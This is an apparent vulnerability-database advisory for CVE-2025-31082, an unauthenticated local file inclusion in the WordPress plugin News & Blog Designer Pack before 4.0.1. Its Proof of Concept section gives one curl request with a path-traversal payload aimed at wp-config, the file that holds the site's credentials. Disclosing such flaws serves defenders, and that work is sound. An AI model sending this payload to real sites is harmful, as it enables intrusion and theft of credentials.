News & Blog Designer Pack < 4.0.1 – Unauthenticated Local File Inclusion | CVE 2025-31082 | Plugin Vulnerabilities

Description

The News & Blog Designer Pack plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 4.0. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.

Proof of Concept

curl --url 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' --data 'action=bdp_load_more_posts&shrt_param=%7B%22design%22%3A%22..%5C%2F..%5C%2F..%5C%2F..%5C%2Fwp-config%22%7D'

Affects Plugins

blog-designer-pack

Fixed in 4.0.1

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/7bcd9611-8f1e-42da-a47b-abcbe0cfd849

Classification

Type

RFI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Ananda Dhakal

Verified

No

WPVDB ID

26d5963e-63bf-468c-877e-fd376e491773

Timeline

Publicly Published

2025-04-01 (about 1 year ago)

Added

2025-04-10 (about 1 year ago)

Last Updated

2026-05-24 (about 4 hours ago)

Other

Published

Title

Published

2025-01-06

Title

Rezgo Online Booking < 4.17.1 - Unauthenticated Local File Inclusion

Published

2025-12-15

Title

Fashion < 5.3.0 - Authenticated (Contributor+) Local File Inclusion

Published

2026-05-12

Title

RTMKit Addons for Elementor < 2.0.3 - Authenticated (Author+) Local File Inclusion via 'path'

Published

2025-09-04

Title

Farm Agrico <= 1.3.11 - Unauthenticated Local File Inclusion

Published

2026-02-27

Title

Bazinga <= 1.1.9 - Unauthenticated Local File Inclusion